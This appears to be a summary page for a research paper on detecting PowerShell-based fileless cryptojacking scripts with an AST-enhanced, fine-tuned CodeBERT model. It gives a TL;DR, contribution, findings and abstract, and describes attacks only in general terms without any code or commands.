Detecting Fileless Cryptojacking in PowerShell Using AST-Enhanced CodeBERT Models

TL;DR

This paper presents an experimental study demonstrating that AST-enhanced fine-tuned CodeBERT models effectively detect PowerShell-based fileless cryptojacking scripts, addressing a critical cybersecurity challenge.

Contribution

It introduces an AST-based fine-tuning approach for CodeBERT to improve detection of stealthy, fileless cryptojacking attacks in PowerShell scripts.

Findings

AST-based CodeBERT achieved high recall in detection

AST integration significantly improves model performance

Effective detection of stealthy PowerShell cryptojacking scripts

Abstract

With the emergence of remote code execution (RCE) vulnerabilities in ubiquitous libraries and advanced social engineering techniques, threat actors have started conducting widespread fileless cryptojacking attacks. These attacks have become effective with stealthy techniques based on PowerShell-based exploitation in Windows OS environments. Even if attacks are detected and malicious scripts removed, processes may remain operational on victim endpoints, creating a significant challenge for detection mechanisms. In this paper, we conducted an experimental study with a collected dataset on detecting PowerShell-based fileless cryptojacking scripts. The results showed that Abstract Syntax Tree (AST)-based fine-tuned CodeBERT achieved a high recall rate, proving the importance of the use of AST integration and fine-tuned pre-trained models for programming language.